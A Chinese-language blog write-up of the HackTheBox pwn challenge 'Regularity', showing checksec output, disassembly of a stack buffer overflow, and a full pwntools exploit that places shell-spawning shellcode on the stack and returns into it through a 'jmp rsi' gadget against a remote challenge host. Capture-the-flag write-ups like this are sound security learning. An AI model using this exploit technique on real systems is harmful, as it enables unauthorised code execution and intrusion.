HackTheBox-Challenges Regularity Writeup

kazma 成大資安社 創辦人/社長
  2024-08-11 11:37:47 2024-08-11 11:37:47 Created   2024-08-11 17:18:50 2024-08-11 17:18:50 Updated    

Brief Intro

因為剛打完 machines 就很好奇 HackTheBox 的 Challeges 是什麼,所以跑來玩玩看,感覺就是 CTF ?

Exploitation

這題蠻簡單的,什麼保護都沒開:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ checksec regularity
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/kazmatw/.cache/.pwntools-cache-3.11/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.12.0)
[*] '/home/kazmatw/regularity'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

程式很簡單,有一個 bof:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:000000000040104B ; signed __int64 read()
.text:000000000040104B read            proc near               ; CODE XREF: _start+19↑p
.text:000000000040104B
.text:000000000040104B buf             = byte ptr -100h
.text:000000000040104B
.text:000000000040104B                 sub     rsp, 100h
.text:0000000000401052                 mov     eax, 0
.text:0000000000401057                 mov     edi, 0          ; fd
.text:000000000040105C                 lea     rsi, [rsp+100h+buf] ; buf
.text:0000000000401060                 mov     edx, 110h       ; count
.text:0000000000401065                 syscall                 ; LINUX - sys_read
.text:0000000000401067                 add     rsp, 100h
.text:000000000040106E                 retn
.text:000000000040106E read            endp

輸入 0x110 到 0x100 的 buffer,足夠我們覆蓋到 return。
那我們就可以在 stack 上寫 shellcode 然後 return 回 buffer 開始的位置也就是 shellcode 的位置,那剛好從上面可以看到是 rsi,又剛好前面程式有用到這個 gadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
.text:0000000000401000 ; void __noreturn start()
.text:0000000000401000                 public _start
.text:0000000000401000 _start          proc near               ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000                                         ; LOAD:0000000000400088↑o
.text:0000000000401000                 mov     edi, 1
.text:0000000000401005                 mov     rsi, offset message1
.text:000000000040100F                 mov     edx, 2Ah ; '*'
.text:0000000000401014                 call    write
.text:0000000000401019                 call    read
.text:000000000040101E                 mov     edi, 1
.text:0000000000401023                 mov     rsi, offset message3
.text:000000000040102D                 mov     edx, 27h ; '''
.text:0000000000401032                 call    write
.text:0000000000401037                 mov     rsi, offset exit
.text:0000000000401041                 jmp     rsi
.text:0000000000401041 _start          endp

所以跳回 0x401041 jmp rsi

Exploit

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.arch = "amd64"
r = remote("94.237.53.113", 45254)

sc = asm(shellcraft.sh())
jmp_rsi = 0x401041
p = flat(sc, b"a" * (0x100 - len(sc)), jmp_rsi)

r.send(p)
r.interactive()

Pwned !!!

pwn

  • Title: HackTheBox-Challenges Regularity Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:37:47
  • Updated at : 2024-08-11 17:18:50
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Challenges-Regularity-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Challenges Regularity Writeup
  1. Brief Intro
  2. Exploitation
  3. Exploit